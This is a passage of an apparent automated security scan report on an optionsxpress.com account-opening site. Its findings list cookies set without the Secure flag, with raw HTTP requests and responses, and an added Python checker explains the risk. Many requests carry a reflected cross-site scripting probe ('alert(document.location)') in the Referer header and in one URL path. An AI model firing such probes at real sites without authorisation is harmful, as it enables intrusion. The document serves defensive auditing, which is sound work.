ETag: "062bdc6ea9c91:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F04D32D8484F69A30C544985DCE10F86; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:31 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

6.12. https://account.optionsxpress.com/images/btn_next_step.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/btn_next_step.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_next_step.jpg HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 2414
Content-Type: image/jpeg
Last-Modified: Wed, 05 Nov 2008 18:29:43 GMT
Accept-Ranges: bytes
ETag: "805ab78743fc91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8232ADF480D39289D31E09763CACF10; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................@.X..
...[SNIP]...

6.13. https://account.optionsxpress.com/images/icon_arrow.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icon_arrow.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icon_arrow.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 449
Content-Type: image/jpeg
Last-Modified: Thu, 10 Jul 2008 18:51:58 GMT
Accept-Ranges: bytes
ETag: "6027ab7bee2c81:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..............................................................................................................
...[SNIP]...

6.14. https://account.optionsxpress.com/images/icons/log_in.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icons/log_in.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icons/log_in.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 1929
Content-Type: image/gif
Last-Modified: Thu, 06 Nov 2008 19:47:15 GMT
Accept-Ranges: bytes
ETag: "80a3e3774840c91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a2.&....]...........{........6b|........................P}.U..........................l....................Iv.........................Ly..........z...........z....................................
...[SNIP]...

6.15. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_ox.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_ox.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 3698
Content-Type: image/gif
Last-Modified: Thu, 01 Sep 2011 04:00:28 GMT
Accept-Ranges: bytes
ETag: "1f1382af5b68cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A07AAAC644F53C5E640E80A0791B83B0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

GIF89a..8..@....q.k.........ZWX....r.M.E#. .........e.^...Y.R.....................@..}.w............... |...............0..P.....`..1-....LIJ?;<...............p........hef........................vstA
...[SNIP]...

6.16. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:33:31 GMT; path=/
Set-Cookie: TLTHID=67AC9231459F78416C6C118417F2EB5D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:31 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

6.17. https://account.optionsxpress.com/images/minus_new_acct.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/minus_new_acct.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/minus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 176
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:32 GMT
Accept-Ranges: bytes
ETag: "60a375ba375c51:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@.-`..$...(FC.V. ..h,....z..D.@T`F....0XF.Iazi.B.;

6.18. https://account.optionsxpress.com/images/newaccount/account_select1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select1.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newaccount/account_select1.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 19995
Content-Type: image/gif
Last-Modified: Mon, 16 May 2011 14:51:10 GMT
Accept-Ranges: bytes
ETag: "d7b82ab2d813cc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a........................................................................................................................................................................................}.........
...[SNIP]...

6.19. https://account.optionsxpress.com/images/newaccount/account_select2.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select2.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/account_select2.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 8859
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:17 GMT
Accept-Ranges: bytes
ETag: "e09b2bff31f1ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57018DB34D660B4883F443A4D0B4D349; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:28 GMT

GIF89a............u..x............nK6.......................wnYG.W8..g..|.yZ.vW.......e\......[0.wdQ.........lki.]B..e......ZUN..}.............fG.xh.jI.|^................W<..l.........................
...[SNIP]...

6.20. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_error_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_error_icon.png HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 385
Content-Type: image/png
Last-Modified: Thu, 28 Oct 2010 18:35:54 GMT
Accept-Ranges: bytes
ETag: "b848a2f4ce76cb1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2AB1B991426954C9E6064DB17C6FCAD0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

.PNG
.
...IHDR.............Q(......tEXtSoftware.Adobe ImageReadyq.e<...#IDATx.b...?..01@...b....ed......$r..D......P.. . ..z..(S.R
..6>.Y......@z........n....@J.I..P.S&..O..1..'.^........@.@.a:..@
...[SNIP]...

6.21. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_tip_icon.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_tip_icon.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 329
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:16 GMT
Accept-Ranges: bytes
ETag: "70e98fe31f1ca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=991AE206424B97B6F977F9B28BE347B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

[binary image/gif data]
...[SNIP]...

6.22. https://account.optionsxpress.com/images/openAccount_bottom.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/openAccount_bottom.jpg

Issue detail

The cookies issued in the response below do not have the Secure flag set. They do not appear to contain session tokens, which may reduce the risk associated with this issue; review the contents of the cookies to determine their function.

Request

GET /images/openAccount_bottom.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:33 GMT
Accept-Ranges: bytes
ETag: "30977b4583f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

[binary image/jpeg data]
...[SNIP]...
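Finding 6.22 above and the findings around it are all instances of one check: a Set-Cookie header on an https:// response that carries no Secure attribute. The Python below is an added example, not part of the XSS.CX report and not Burp's own code, that performs that check on the response headers copied from 6.22, also flags a missing HttpOnly attribute and a Domain attribute that widens the cookie's scope, and shows the hardened header. The point the report leaves implicit is why the flag matters here: a cookie scoped to Domain=.optionsxpress.com without Secure is attached to a plain-http request to any host under that domain, so an attacker on the network path who can make the browser fetch such a URL receives the value in the clear. The function names, the over_tls parameter and the sample response constant are this example's own.

```python
import re
from dataclasses import dataclass

# Response headers copied from finding 6.22 above (image body omitted); this is
# the input the checker is run on.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Length: 892\r\n"
    "Content-Type: image/jpeg\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Set-Cookie: TLTHID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com\r\n"
    "Set-Cookie: TLTSID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com\r\n"
    "Date: Thu, 08 Sep 2011 19:33:30 GMT\r\n"
    "\r\n"
)


@dataclass
class Cookie:
    name: str
    value: str
    attrs: list  # [(attribute name as sent, value or "" for a bare flag)], original order

    def attr(self, key: str):
        """Case-insensitive attribute lookup: None if absent, "" for a bare flag."""
        for k, v in self.attrs:
            if k.lower() == key.lower():
                return v
        return None

    @property
    def secure(self) -> bool:
        return self.attr("Secure") is not None

    @property
    def httponly(self) -> bool:
        return self.attr("HttpOnly") is not None

    @property
    def domain(self):
        return self.attr("Domain")


def parse_set_cookie(header_value: str) -> Cookie:
    """Split one Set-Cookie value into name, value and its attribute list."""
    first, *rest = header_value.split(";")
    name, _, value = first.strip().partition("=")
    attrs = []
    for item in rest:
        k, _, v = item.strip().partition("=")
        if k:
            attrs.append((k.strip(), v.strip()))
    return Cookie(name.strip(), value.strip(), attrs)


def set_cookie_headers(raw_response: str) -> list:
    """Return every Set-Cookie value from the header block of a raw HTTP response."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    values = []
    for line in head.split("\n")[1:]:  # skip the status line
        k, _, v = line.rstrip("\r").partition(":")
        if k.strip().lower() == "set-cookie":
            values.append(v.strip())
    return values


def audit(raw_response: str, over_tls: bool = True) -> dict:
    """Map each cookie name to the problems found with it.

    The missing-Secure check only applies to responses received over TLS
    (over_tls is this example's own parameter): on a plain-http response the
    flag would change nothing, which is why the report raises the issue only
    for https:// hosts."""
    problems = {}
    for hv in set_cookie_headers(raw_response):
        c = parse_set_cookie(hv)
        issues = []
        if over_tls and not c.secure:
            issues.append("missing Secure")
        if not c.httponly:
            issues.append("missing HttpOnly")
        if c.domain:
            # Any Domain attribute makes this a domain cookie: the browser sends
            # it to every host under that domain, http:// ones included.
            issues.append(f"Domain={c.domain} scopes it to every subdomain")
        if issues:
            problems[c.name] = issues
    return problems


def harden(header_value: str) -> str:
    """Return the same Set-Cookie value with Secure and HttpOnly appended,
    keeping the existing attributes in their original order."""
    c = parse_set_cookie(header_value)
    parts = [f"{c.name}={c.value}"]
    for k, v in c.attrs:
        if k.lower() in ("secure", "httponly"):
            continue
        parts.append(f"{k}={v}" if v else k)
    parts += ["Secure", "HttpOnly"]
    return "; ".join(parts)


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_RESPONSE).items():
        print(f"{name}: {', '.join(issues)}")
    for hv in set_cookie_headers(SAMPLE_RESPONSE):
        print("hardened:", harden(hv))
```

Two caveats on reading the report's own wording. Its remark that a cookie "does not appear to contain a session token" rests on the cookie name alone; TLTHID and TLTSID follow the naming of Tealeaf session-capture cookies (an inference from the names, not something the report states), and whether a value is sensitive has to be settled from what the server does with it, not from the name. And the Domain check above is an addition: the report does not flag the domain-wide scope, but it is what turns a missing Secure flag on one image request into exposure on every host under the domain.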

6.23. https://account.optionsxpress.com/images/plus_new_acct.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/plus_new_acct.gif

Issue detail

The cookies issued in the response below do not have the Secure flag set. They do not appear to contain session tokens, which may reduce the risk associated with this issue; review the contents of the cookies to determine their function.

Request

GET /images/plus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:17 GMT
Accept-Ranges: bytes
ETag: "b0e14052a375c51:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

[binary image/gif data]

6.24. https://account.optionsxpress.com/images/rightColumn_divider.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/rightColumn_divider.jpg

Issue detail

The cookies issued in the response below do not have the Secure flag set. They do not appear to contain session tokens, which may reduce the risk associated with this issue; review the contents of the cookies to determine their function.

Request

GET /images/rightColumn_divider.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 624
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:06 GMT
Accept-Ranges: bytes
ETag: "40c45d3583f0ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

[binary image/jpeg data]
...[SNIP]...

6.25. https://account.optionsxpress.com/images/styles/bubble/b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/b.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/b.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 95
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f0c783bc1bfcca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=77A51C33434FCC2754ED389A537B984E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

[binary image/gif data]

6.26. https://account.optionsxpress.com/images/styles/bubble/bl.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/bl.gif

Issue detail

